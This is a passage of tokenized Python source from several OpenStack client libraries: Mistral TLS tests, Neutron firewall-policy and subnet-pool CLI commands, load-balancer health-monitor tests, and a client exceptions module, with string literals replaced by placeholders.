<EOL> self . assertEqual ( mock . call_args [ <NUM_LIT:0> ] , expected_args ) <EOL> self . assertDictEqual ( mock . call_args [ <NUM_LIT:1> ] , expected_kwargs ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_bad_cacert ( self , keystone_client_mock ) : <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> self . assertRaises ( <EOL> ValueError , <EOL> client . client , <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = '<STR_LIT>' , <EOL> insecure = False <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_bad_insecure ( self , keystone_client_mock , <EOL> log_warning_mock ) : <EOL> fd , path = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> try : <EOL> client . client ( <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = path , <EOL> insecure = True <EOL> ) <EOL> finally : <EOL> os . close ( fd ) <EOL> os . unlink ( path ) <EOL> self . assertTrue ( log_warning_mock . called ) </s>
<s> from monascaclient . common import utils <EOL> def Client ( version , * args , ** kwargs ) : <EOL> module = utils . import_versioned_module ( version , '<STR_LIT>' ) <EOL> client_class = getattr ( module , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs and kwargs [ '<STR_LIT>' ] : <EOL> utils . set_env_variables ( kwargs ) <EOL> return client_class ( * args , ** kwargs ) </s>
<s> project = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> copyright = u'<STR_LIT>' <EOL> add_function_parentheses = True <EOL> add_module_names = True <EOL> pygments_style = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' % project <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , <EOL> '<STR_LIT>' % project , <EOL> u'<STR_LIT>' % project , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import print_function <EOL> import argparse <EOL> from neutronclient . _i18n import _ <EOL> from neutronclient . common import utils <EOL> from neutronclient . neutron import v2_0 as neutronv20 <EOL> def _format_firewall_rules ( firewall_policy ) : <EOL> try : <EOL> output = '<STR_LIT:[>' + '<STR_LIT>' . join ( [ rule for rule in <EOL> firewall_policy [ '<STR_LIT>' ] ] ) + '<STR_LIT:]>' <EOL> return output <EOL> except ( TypeError , KeyError ) : <EOL> return '<STR_LIT>' <EOL> def add_common_args ( parser ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = lambda x : x . split ( ) , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def parse_common_args ( client , parsed_args ) : <EOL> if parsed_args . firewall_rules : <EOL> _firewall_rules = [ ] <EOL> for f in parsed_args . firewall_rules : <EOL> _firewall_rules . append ( <EOL> neutronv20 . find_resourceid_by_name_or_id ( <EOL> client , '<STR_LIT>' , f ) ) <EOL> body = { '<STR_LIT>' : _firewall_rules } <EOL> else : <EOL> body = { } <EOL> neutronv20 . update_dict ( parsed_args , body , <EOL> [ '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return { '<STR_LIT>' : body } <EOL> class ListFirewallPolicy ( neutronv20 . ListCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> list_columns = [ '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> _formatters = { '<STR_LIT>' : _format_firewall_rules , <EOL> } <EOL> pagination_support = True <EOL> sorting_support = True <EOL> class ShowFirewallPolicy ( neutronv20 . ShowCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class CreateFirewallPolicy ( neutronv20 . CreateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> parser . 
add_argument ( <EOL> '<STR_LIT:name>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' ) , <EOL> default = argparse . SUPPRESS ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' ) , <EOL> default = argparse . SUPPRESS ) <EOL> add_common_args ( parser ) <EOL> def args2body ( self , parsed_args ) : <EOL> return parse_common_args ( self . get_client ( ) , parsed_args ) <EOL> class UpdateFirewallPolicy ( neutronv20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> add_common_args ( parser ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> utils . add_boolean_argument ( <EOL> parser , '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> utils . add_boolean_argument ( <EOL> parser , '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def args2body ( self , parsed_args ) : <EOL> return parse_common_args ( self . get_client ( ) , parsed_args ) <EOL> class DeleteFirewallPolicy ( neutronv20 . DeleteCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class FirewallPolicyInsertRule ( neutronv20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def call_api ( self , neutron_client , firewall_policy_id , body ) : <EOL> return neutron_client . firewall_policy_insert_rule ( firewall_policy_id , <EOL> body ) <EOL> def args2body ( self , parsed_args ) : <EOL> _rule = '<STR_LIT>' <EOL> if parsed_args . firewall_rule_id : <EOL> _rule = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . firewall_rule_id ) <EOL> _insert_before = '<STR_LIT>' <EOL> if '<STR_LIT>' in parsed_args : <EOL> if parsed_args . 
insert_before : <EOL> _insert_before = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . insert_before ) <EOL> _insert_after = '<STR_LIT>' <EOL> if '<STR_LIT>' in parsed_args : <EOL> if parsed_args . insert_after : <EOL> _insert_after = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . insert_after ) <EOL> body = { '<STR_LIT>' : _rule , <EOL> '<STR_LIT>' : _insert_before , <EOL> '<STR_LIT>' : _insert_after } <EOL> return body <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( FirewallPolicyInsertRule , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> self . add_known_arguments ( parser ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> neutron_client = self . get_client ( ) <EOL> body = self . args2body ( parsed_args ) <EOL> _id = neutronv20 . find_resourceid_by_name_or_id ( neutron_client , <EOL> self . resource , <EOL> parsed_args . id ) <EOL> self . call_api ( neutron_client , _id , body ) <EOL> print ( ( _ ( '<STR_LIT>' ) % <EOL> { '<STR_LIT:id>' : parsed_args . id } ) , file = self . app . stdout ) <EOL> class FirewallPolicyRemoveRule ( neutronv20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def call_api ( self , neutron_client , firewall_policy_id , body ) : <EOL> return neutron_client . firewall_policy_remove_rule ( firewall_policy_id , <EOL> body ) <EOL> def args2body ( self , parsed_args ) : <EOL> _rule = '<STR_LIT>' <EOL> if parsed_args . firewall_rule_id : <EOL> _rule = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . 
get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . firewall_rule_id ) <EOL> body = { '<STR_LIT>' : _rule } <EOL> return body <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( FirewallPolicyRemoveRule , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> self . add_known_arguments ( parser ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> neutron_client = self . get_client ( ) <EOL> body = self . args2body ( parsed_args ) <EOL> _id = neutronv20 . find_resourceid_by_name_or_id ( neutron_client , <EOL> self . resource , <EOL> parsed_args . id ) <EOL> self . call_api ( neutron_client , _id , body ) <EOL> print ( ( _ ( '<STR_LIT>' ) % <EOL> { '<STR_LIT:id>' : parsed_args . id } ) , file = self . app . stdout ) </s>
<s> from neutronclient . _i18n import _ <EOL> from neutronclient . common import utils <EOL> from neutronclient . neutron import v2_0 as neutronV20 <EOL> def _format_prefixes ( subnetpool ) : <EOL> try : <EOL> return '<STR_LIT:\n>' . join ( pool for pool in subnetpool [ '<STR_LIT>' ] ) <EOL> except ( TypeError , KeyError ) : <EOL> return subnetpool [ '<STR_LIT>' ] <EOL> def add_updatable_arguments ( parser , for_create = False ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = int , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = int , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = int , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = for_create , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> utils . add_boolean_argument ( <EOL> parser , '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def updatable_args2body ( parsed_args , body ) : <EOL> neutronV20 . update_dict ( parsed_args , body , <EOL> [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:description>' ] ) <EOL> class ListSubnetPool ( neutronV20 . ListCommand ) : <EOL> """<STR_LIT>""" <EOL> _formatters = { '<STR_LIT>' : _format_prefixes , } <EOL> resource = '<STR_LIT>' <EOL> list_columns = [ '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> pagination_support = True <EOL> sorting_support = True <EOL> class ShowSubnetPool ( neutronV20 . ShowCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class CreateSubnetPool ( neutronV20 . 
CreateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> add_updatable_arguments ( parser , for_create = True ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT:name>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def args2body ( self , parsed_args ) : <EOL> body = { '<STR_LIT>' : parsed_args . prefixes } <EOL> updatable_args2body ( parsed_args , body ) <EOL> if parsed_args . shared : <EOL> body [ '<STR_LIT>' ] = True <EOL> if parsed_args . address_scope : <EOL> _addrscope_id = neutronV20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . address_scope ) <EOL> body [ '<STR_LIT>' ] = _addrscope_id <EOL> return { '<STR_LIT>' : body } <EOL> class DeleteSubnetPool ( neutronV20 . DeleteCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class UpdateSubnetPool ( neutronV20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> add_updatable_arguments ( parser ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> addrscope_args = parser . add_mutually_exclusive_group ( ) <EOL> addrscope_args . add_argument ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> addrscope_args . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def args2body ( self , parsed_args ) : <EOL> body = { } <EOL> updatable_args2body ( parsed_args , body ) <EOL> if parsed_args . 
no_address_scope : <EOL> body [ '<STR_LIT>' ] = None <EOL> elif parsed_args . address_scope : <EOL> _addrscope_id = neutronV20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . address_scope ) <EOL> body [ '<STR_LIT>' ] = _addrscope_id <EOL> return { '<STR_LIT>' : body } </s>
<s> import sys <EOL> from neutronclient . neutron . v2_0 . lb . v2 import healthmonitor <EOL> from neutronclient . tests . unit import test_cli20 <EOL> class CLITestV20LbHealthMonitorJSON ( test_cli20 . CLITestV20Base ) : <EOL> def test_create_healthmonitor_with_mandatory_params ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . CreateHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> my_id = '<STR_LIT>' <EOL> type = '<STR_LIT>' <EOL> max_retries = '<STR_LIT:3>' <EOL> delay = '<STR_LIT>' <EOL> timeout = '<STR_LIT>' <EOL> pool = '<STR_LIT>' <EOL> args = [ '<STR_LIT>' , type , '<STR_LIT>' , max_retries , <EOL> '<STR_LIT>' , delay , '<STR_LIT>' , timeout , '<STR_LIT>' , pool ] <EOL> position_names = [ '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> position_values = [ type , max_retries , delay , timeout , pool ] <EOL> self . _test_create_resource ( resource , cmd , '<STR_LIT>' , my_id , args , <EOL> position_names , position_values , <EOL> cmd_resource = cmd_resource ) <EOL> def test_create_healthmonitor_with_all_params ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . CreateHealthMonitor ( test_cli20 . MyApp ( sys . 
stdout ) , <EOL> None ) <EOL> my_id = '<STR_LIT>' <EOL> type = '<STR_LIT>' <EOL> max_retries = '<STR_LIT:3>' <EOL> delay = '<STR_LIT>' <EOL> timeout = '<STR_LIT>' <EOL> http_method = '<STR_LIT:GET>' <EOL> expected_codes = '<STR_LIT>' <EOL> url_path = '<STR_LIT>' <EOL> pool = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , http_method , <EOL> '<STR_LIT>' , expected_codes , '<STR_LIT>' , url_path , <EOL> '<STR_LIT>' , type , '<STR_LIT>' , max_retries , <EOL> '<STR_LIT>' , delay , '<STR_LIT>' , timeout , '<STR_LIT>' , pool , <EOL> '<STR_LIT>' , name ] <EOL> position_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> position_values = [ False , http_method , expected_codes , url_path , <EOL> type , max_retries , delay , timeout , pool , name ] <EOL> self . _test_create_resource ( resource , cmd , '<STR_LIT>' , my_id , args , <EOL> position_names , position_values , <EOL> cmd_resource = cmd_resource ) <EOL> def test_list_healthmonitors ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , True , <EOL> cmd_resources = cmd_resources ) <EOL> def test_list_healthmonitors_pagination ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources_with_pagination ( resources , cmd , <EOL> cmd_resources = cmd_resources ) <EOL> def test_list_healthmonitors_sort ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . 
_test_list_resources ( resources , cmd , True , <EOL> cmd_resources = cmd_resources ) <EOL> def test_list_healthmonitors_limit ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , page_size = <NUM_LIT:1000> , <EOL> cmd_resources = cmd_resources ) <EOL> def test_show_healthmonitor_id ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . ShowHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> args = [ '<STR_LIT>' , '<STR_LIT:id>' , self . test_id ] <EOL> self . _test_show_resource ( resource , cmd , self . test_id , args , [ '<STR_LIT:id>' ] , <EOL> cmd_resource = cmd_resource ) <EOL> def test_show_healthmonitor_id_name ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . ShowHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> args = [ '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' , self . test_id ] <EOL> self . _test_show_resource ( resource , cmd , self . test_id , <EOL> args , [ '<STR_LIT:id>' , '<STR_LIT:name>' ] , <EOL> cmd_resource = cmd_resource ) <EOL> def _test_update_hm ( self , args , expected_values ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> my_id = '<STR_LIT>' <EOL> cmd = healthmonitor . UpdateHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> args . insert ( <NUM_LIT:0> , my_id ) <EOL> self . _test_update_resource ( resource , cmd , my_id , <EOL> args , <EOL> expected_values , <EOL> cmd_resource = cmd_resource ) <EOL> def test_update_healthmonitor ( self ) : <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , { '<STR_LIT:name>' : '<STR_LIT>' , } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . 
_test_update_hm ( [ '<STR_LIT>' , '<STR_LIT:5>' ] , { '<STR_LIT>' : '<STR_LIT:5>' , } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT:5>' ] , { '<STR_LIT>' : '<STR_LIT:5>' } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT:False>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> def test_delete_healthmonitor ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . DeleteHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> my_id = '<STR_LIT>' <EOL> args = [ my_id ] <EOL> self . _test_delete_resource ( resource , cmd , my_id , args , <EOL> cmd_resource = cmd_resource ) </s>
<s> import sys <EOL> from neutronclient . neutron . v2_0 import servicetype <EOL> from neutronclient . tests . unit import test_cli20 <EOL> class CLITestV20ServiceProvidersJSON ( test_cli20 . CLITestV20Base ) : <EOL> id_field = "<STR_LIT:name>" <EOL> def setUp ( self ) : <EOL> super ( CLITestV20ServiceProvidersJSON , self ) . setUp ( <EOL> plurals = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_list_service_providers ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , True ) <EOL> def test_list_service_providers_pagination ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources_with_pagination ( resources , cmd ) <EOL> def test_list_service_providers_sort ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , <EOL> sort_key = [ "<STR_LIT:name>" ] , <EOL> sort_dir = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_list_service_providers_limit ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , page_size = <NUM_LIT:1000> ) </s>
<s> """<STR_LIT>""" <EOL> class UnsupportedVersion ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnsupportedAttribute ( AttributeError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , argument_name , start_version , end_version = None ) : <EOL> if end_version : <EOL> self . message = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % { "<STR_LIT:name>" : argument_name , <EOL> "<STR_LIT:start>" : start_version , <EOL> "<STR_LIT:end>" : end_version } ) <EOL> else : <EOL> self . message = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % { "<STR_LIT:name>" : argument_name , "<STR_LIT:start>" : start_version } ) <EOL> class CommandError ( Exception ) : <EOL> pass <EOL> class AuthorizationFailure ( Exception ) : <EOL> pass <EOL> class NoUniqueMatch ( Exception ) : <EOL> pass <EOL> class AuthSystemNotFound ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , auth_system ) : <EOL> self . auth_system = auth_system <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % repr ( self . auth_system ) <EOL> class NoTokenLookupException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class EndpointNotFound ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AmbiguousEndpoints ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , endpoints = None ) : <EOL> self . endpoints = endpoints <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % repr ( self . endpoints ) <EOL> class ConnectionRefused ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , response = None ) : <EOL> self . response = response <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % repr ( self . response ) <EOL> class ResourceInErrorState ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , obj ) : <EOL> msg = "<STR_LIT>" % obj . __class__ . __name__ <EOL> fault_msg = getattr ( obj , "<STR_LIT>" , { } ) . get ( "<STR_LIT:message>" ) <EOL> if fault_msg : <EOL> msg += "<STR_LIT>" % fault_msg <EOL> self . 
message = "<STR_LIT>" % msg <EOL> class VersionNotFoundForAPIMethod ( Exception ) : <EOL> msg_fmt = "<STR_LIT>" <EOL> def __init__ ( self , version , method ) : <EOL> self . version = version <EOL> self . method = method <EOL> def __str__ ( self ) : <EOL> return self . msg_fmt % { "<STR_LIT>" : self . version , "<STR_LIT>" : self . method } <EOL> class InstanceInDeletedState ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ClientException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> message = '<STR_LIT>' <EOL> def __init__ ( self , code , message = None , details = None , request_id = None , <EOL> url = None , method = None ) : <EOL> self . code = code <EOL> self . message = message or self . __class__ . message <EOL> self . details = details <EOL> self . request_id = request_id <EOL> self . url = url <EOL> self . method = method <EOL> def __str__ ( self ) : <EOL> formatted_string = "<STR_LIT>" % ( self . message , self . code ) <EOL> if self . request_id : <EOL> formatted_string += "<STR_LIT>" % self . request_id <EOL> return formatted_string <EOL> class RetryAfterException ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> try : <EOL> self . retry_after = int ( kwargs . pop ( '<STR_LIT>' ) ) <EOL> except ( KeyError , ValueError ) : <EOL> self . retry_after = <NUM_LIT:0> <EOL> super ( RetryAfterException , self ) . 
__init__ ( * args , ** kwargs ) <EOL> class BadRequest ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class Unauthorized ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class Forbidden ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class NotFound ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class MethodNotAllowed ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class NotAcceptable ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class Conflict ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class OverLimit ( RetryAfterException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class RateLimit ( RetryAfterException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class HTTPNotImplemented ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> _error_classes = [ BadRequest , Unauthorized , Forbidden , NotFound , <EOL> MethodNotAllowed , NotAcceptable , Conflict , OverLimit , <EOL> RateLimit , HTTPNotImplemented ] <EOL> _code_map = dict ( ( c . http_status , c ) for c in _error_classes ) <EOL> class InvalidUsage ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def from_response ( response , body , url , method = None ) : <EOL> """<STR_LIT>""" <EOL> cls = _code_map . get ( response . status_code , ClientException ) <EOL> kwargs = { <EOL> '<STR_LIT:code>' : response . status_code , <EOL> '<STR_LIT>' : method , <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> if response . 
